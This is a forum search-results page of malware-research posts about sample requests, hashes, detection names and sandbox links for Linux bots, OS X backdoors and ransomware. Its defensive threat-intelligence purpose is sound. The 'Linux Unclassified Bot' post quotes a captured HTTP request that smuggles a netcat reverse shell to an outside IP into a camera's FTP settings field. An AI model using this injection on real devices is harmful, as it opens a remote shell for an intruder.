Search found 45 matches

by K_Mikhail
Sun Aug 06, 2017 5:01 pm
Forum: Completed Malware Requests
Topic: TrojanSpy:MSIL/Lachemp.A sample request
Replies: 2
Views: 7410

Re: TrojanSpy:MSIL/Lachemp.A sample request

BTW, HEUR:Trojan.MSIL.Tpyn.chu (Kaspersky) can also be reproduced on the SHA1: 2d3de82a04024b124411fb764cee44b803996a57 sample, which is from the EternalRocks malware family.
by K_Mikhail
Sat Jul 15, 2017 7:42 pm
Forum: Malware
Topic: Linux Unclassified Bot
Replies: 1
Views: 7846

Linux Unclassified Bot

Hello! Found on: https://detux.org/report.php?sha256=8c56e2971649d137917e0e1b45985473e68e803bd374c8a5c0b4c4decdb4751a GET /set_ftp.cgi?loginuse= &loginpas= &next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+11.11.11.111+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0 GET /ftpt...
by K_Mikhail
Thu Jul 06, 2017 4:41 pm
Forum: Malware
Topic: Linux PWS Trojan
Replies: 0
Views: 3445

Linux PWS Trojan

Hello! Found on [1] https://malwr.com/analysis/NmM4NGQ4ZWRiY2I0NDE2NjkxZTgwMWMxOTVkZWI4ZWM/ (unupx) [2] https://malwr.com/analysis/MWJmZWE5N2ZlZWFiNDExMzlmN2RhNTJmY2FkYjkwZWY/ (upx) Detection is poor: 1/56 for both variants: https://virustotal.com/en/file/0e32b7ce2b64b9f993b7431a2b89484c8a3990fcc...
by K_Mikhail
Thu Jul 06, 2017 6:43 am
Forum: Completed Malware Requests
Topic: Python/Filecoder.R
Replies: 1
Views: 2495

Python/Filecoder.R

Hello!

I'm looking for a Python/Filecoder.R sample, which was mentioned in this article: https://www.welivesecurity.com/2017/06/ ... t-ukraine/

SHA1: AF07AB5950D35424B1ECCC3DD0EEBC05AE7DDB5E

Thanks for the assistance!
by K_Mikhail
Mon Jul 03, 2017 6:16 pm
Forum: Malware
Topic: OSX Kirino (BigFive) BackDoor
Replies: 2
Views: 4041

Re: OSX Kirino (BigFive) BackDoor

Mac.BackDoor.BigFive.1, Mac.BackDoor.BigFive.2, Mac.BackDoor.BigFive.3 renamed to Mac.BackDoor.Kirino.1, Mac.BackDoor.Kirino.2, Mac.BackDoor.Kirino.3.
by K_Mikhail
Mon Jul 03, 2017 10:59 am
Forum: Malware
Topic: OSX Kirino (BigFive) BackDoor
Replies: 2
Views: 4041

OSX Kirino (BigFive) BackDoor

Subj [1] https://virustotal.com/en/file/2ccd0e9df8c2411dfe60b76edb25607193bfb316acac21b7250be65c37215ca3/analysis/1499079161/ (HEUR:Exploit.OSX.CVE-2016-4625.a || Exploit.CVE-2016-4625.1 || a variant of OSX/Exploit.CVE-2016-4625.B) [2] https://virustotal.com/en/file/5b13a275c3d33465a5c323558b1bf8bbb...
by K_Mikhail
Thu Jun 29, 2017 9:03 am
Forum: Completed Malware Requests
Topic: Old osx worm "Niqtana"
Replies: 2
Views: 8569

Re: Old osx worm "Niqtana"

Hello!

http://contagiodump.blogspot.com/2012/0 ... lware.html

2007 Worm.OSX.Niqtana.a 2C25908053ECC1474D2FB2C530EA5CFA
by K_Mikhail
Thu Jun 15, 2017 1:52 pm
Forum: Malware
Topic: Possibly OS/X Ransomware (File coder)
Replies: 5
Views: 11506

Re: Possibly OS/X Ransomware (File coder)

Thanks for attaching the file!

Despite the screaming alarm string, the file has in fact been marked as clean by Dr.Web's and KL's virus labs.
by K_Mikhail
Tue Jun 13, 2017 7:58 am
Forum: Malware
Topic: Linux/FileCoder (Linux.Encoder)
Replies: 18
Views: 41172

Re: Linux/FileCoder (Linux.Encoder)

SHA1: d7b0255d7d98c33a30fe71543ec98d802c2a2dd7 FileCoder.O (NOD32) || Ransom:Linux/Erebus.A: https://www.virustotal.com/en/file/d889734783273b7158deeae6cf804a6be99c3a5353d94225a4dbe92caf3a3d48/analysis/ UPD: SHA1: ffebffc89a0b417e56dea3fdce962ee54f7ce00f : https://www.virustotal.com/en/file/0b7996bc...
by K_Mikhail
Mon Jun 12, 2017 8:31 pm
Forum: Malware
Topic: Possibly OS/X Ransomware (File coder)
Replies: 5
Views: 11506

Possibly OS/X Ransomware (File coder)

Hello! Possibly OS/X Ransomware (File coder). [1] https://malwr.com/analysis/MWRiOTVhZmEzMjQ2NGUxYTg1ZWRhMTJkZWY4ODg5YTc/ (Mach-O 64-bit, not downloadable); Alarm-string: "Send me this identifier together with your $$$$ to derypt your file" [2] https://virustotal.com/en/file/4c27249bced8cb185a84671f...